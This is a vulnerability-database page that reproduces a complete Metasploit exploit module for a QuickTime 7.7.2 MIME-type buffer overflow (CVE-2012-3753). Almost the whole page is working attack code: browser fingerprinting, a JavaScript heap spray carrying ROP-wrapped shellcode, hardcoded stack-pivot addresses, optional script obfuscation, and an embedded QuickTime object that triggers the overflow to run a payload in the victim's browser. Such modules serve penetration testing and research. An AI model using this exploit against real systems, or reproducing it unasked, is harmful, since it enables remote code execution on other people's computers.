Lucene search
K

Apple QuickTime 7.7.2 MIME Type Buffer Overflow

🗓️ 27 Nov 2012 11:10:00Reported by Pavel Polischouk, juan vazquez <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 24 Views

Apple QuickTime 7.7.2 MIME Type Buffer Overflow. Buffer overflow in Apple QuickTime 7.7.2 when processing a malformed Content-Type header. Tested on Safari 5.1.7 and 5.0.7 on Windows XP SP3

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::Egghunter
  include Msf::Exploit::RopDb

  #include Msf::Exploit::Remote::BrowserAutopwn
  #autopwn_info({
  #  :os_name => OperatingSystems::Match::WINDOWS,
  #  :ua_name    => HttpClients::SAFARI,
  #  :ua_maxver  => '5.0.1',
  #  :ua_maxver  => '5.1.7',
  #  :javascript => true,
  #  :rank       => NormalRanking, # reliable memory corruption
  #  :vuln_test  => nil
  #})

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apple QuickTime 7.7.2 MIME Type Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in Apple QuickTime 7.7.2. The stack
        based overflow occurs when processing a malformed Content-Type header. The module
        has been tested successfully on Safari 5.1.7 and 5.0.7 on Windows XP SP3.
      },
      'Author'         =>
        [
          'Pavel Polischouk', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2012-3753' ],
          [ 'OSVDB', '87088'],
          [ 'BID', '56438' ],
          [ 'URL', 'http://support.apple.com/kb/HT5581' ],
          [ 'URL', 'http://asintsov.blogspot.com.es/2012/11/heapspray.html' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        },
      'Payload'        =>
        {
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
        },
      'Platform' => 'win',
      'Targets'  =>
        [
          # Tested with QuickTime 7.7.2
          [ 'Automatic', {} ],
          [ 'Windows XP SP3 / Safari 5.1.7 / Apple QuickTime Player 7.7.2',
            {
              'OffsetFirstStackPivot' => 389,
              'OffsetSecondStackPivot' => 105,
              'FirstStackPivot' => 0x671a230b, # ADD ESP,4B8 # RETN # Quicktime.qts,
              'SecondStackPivot' => 0x67123437, # pop esp / ret # Quicktime.qts
              'SprayOffset' => 264,
              'SprayedAddress' => 0x60130124
            }
          ],
          [ 'Windows XP SP3 / Safari 5.0.5 / Apple QuickTime Player 7.7.2',
            {
              'OffsetFirstStackPivot' => 389,
              'OffsetSecondStackPivot' => 105,
              'FirstStackPivot' => 0x671a230b, # ADD ESP,4B8 # RETN # Quicktime.qts,
              'SecondStackPivot' => 0x67123437, # pop esp / ret # Quicktime.qts
              'SprayOffset' => 264,
              'SprayedAddress' => 0x60130124
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2012-11-07',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
      ], self.class
    )
  end

  def get_target(agent)
    #If the user is already specified by the user, we'll just use that
    return target if target.name != 'Automatic'

    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''

    browser_name = ""
    if agent =~ /Safari/ and agent=~ /Version\/5\.1\.7/
      browser_name = "Safari 5.1.7"
    elsif agent =~ /Safari/ and agent=~ /Version\/5\.0\.5/
      browser_name = "Safari 5.0.5"
    end

    os_name = 'Windows XP SP3'

    targets.each do |t|
      if (!browser_name.empty? and t.name.include?(browser_name)) and (!nt.empty? and t.name.include?(os_name))
        print_status("Target selected as: #{t.name}")
        return t
      end
    end

    return nil
  end

  def on_request_uri(client, request)

    agent = request.headers['User-Agent']
    my_target = get_target(agent)

    # Avoid the attack if the victim doesn't have the same setup we're targeting
    if my_target.nil?
      print_error("Browser not supported: #{agent}")
      send_not_found(cli)
      return
    end

    return if ((p = regenerate_payload(client)) == nil)

    if request.uri =~ /\.smil$/
      print_status("Sending exploit (target: #{my_target.name})")
      smil = rand_text_alpha(20)
      type = rand_text_alpha_lower(1)
      subtype = rand_text_alpha_lower(my_target['OffsetSecondStackPivot'])
      subtype << [my_target['SecondStackPivot']].pack("V")
      subtype << [my_target['SprayedAddress']].pack("V")
      subtype << rand_text_alpha_lower(my_target['OffsetFirstStackPivot'] - subtype.length)
      subtype << rand_text_alpha_lower(4)
      subtype << [my_target['FirstStackPivot']].pack("V")
      subtype << rand_text_alpha_lower(10000 - subtype.length)
      send_response(client, smil, { 'Content-Type' => "#{type}/#{subtype}" })
    else
      print_status("Sending initial HTML")
      url =  ((datastore['SSL']) ? "https://" : "http://")
      url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
      url << ":" + datastore['SRVPORT'].to_s
      url << get_resource
      fname = rand_text_alphanumeric(4)

      code = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})
      js_code = Rex::Text.to_unescape(code, Rex::Arch.endian(my_target.arch))
      offset = rand_text(my_target['SprayOffset'])
      js_offset = Rex::Text.to_unescape(offset, Rex::Arch.endian(my_target.arch))
      fill = rand_text(4)
      js_fill = Rex::Text.to_unescape(fill, Rex::Arch.endian(my_target.arch))

      # Heap Spray based on http://asintsov.blogspot.com.es/2012/11/heapspray.html
      js = <<-JSSPRAY
function heapSpray(offset, shellcode, fillsled) {
  var chunk_size, headersize, fillsled_len, code;
  var i, codewithnum;
  chunk_size = 0x40000;
  headersize = 0x10;
  fillsled_len = chunk_size - (headersize + offset.length + shellcode.length);
  while (fillsled.length <fillsled_len)
    fillsled += fillsled;
  fillsled = fillsled.substring(0, fillsled_len);
  code = offset + shellcode + fillsled;
  heap_chunks = new Array();
  for (i = 0; i<1000; i++)
  {
    codewithnum = "HERE" + code;
    heap_chunks[i] = codewithnum.substring(0, codewithnum.length);
  }
}
var myoffset = unescape("#{js_offset}");
var myshellcode = unescape("#{js_code}");
var myfillsled = unescape("#{js_fill}");
heapSpray(myoffset,myshellcode,myfillsled);
      JSSPRAY

      if datastore['OBFUSCATE']
        js = ::Rex::Exploitation::JSObfu.new(js)
        js.obfuscate(memory_sensitive: true)
      end

      content =  "<html>"
      content << "<head><script>"
      content << "#{js}"
      content << "</script></head>"
      content << "<body>"
      content << <<-ENDEMBED
<OBJECT
CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
WIDTH="1"
HEIGHT="1"
CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab">
<PARAM name="SRC"        VALUE = "#{url}/#{fname}.smil">
<PARAM name="QTSRC"      VALUE = "#{url}/#{fname}.smil">
<PARAM name="AUTOPLAY"   VALUE = "true"               >
<PARAM name="TYPE"       VALUE = "video/quicktime"    >
<PARAM name="TARGET"     VALUE = "myself"             >
<EMBED
  SRC        = "#{url}/#{fname}.smil"
  QTSRC      = "#{url}/#{fname}.smil"
  TARGET     = "myself"
  WIDTH      = "1"
  HEIGHT     = "1"
  AUTOPLAY   = "true"
  PLUGIN     = "quicktimeplugin"
  TYPE       = "video/quicktime"
  CACHE      = "false"
  PLUGINSPAGE= "http://www.apple.com/quicktime/download/" >
</EMBED>
</OBJECT>
      ENDEMBED
      content << "</body></html>"
      send_response(client, content, { 'Content-Type' => "text/html" })
    end

    # Handle the payload
    handler(client)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation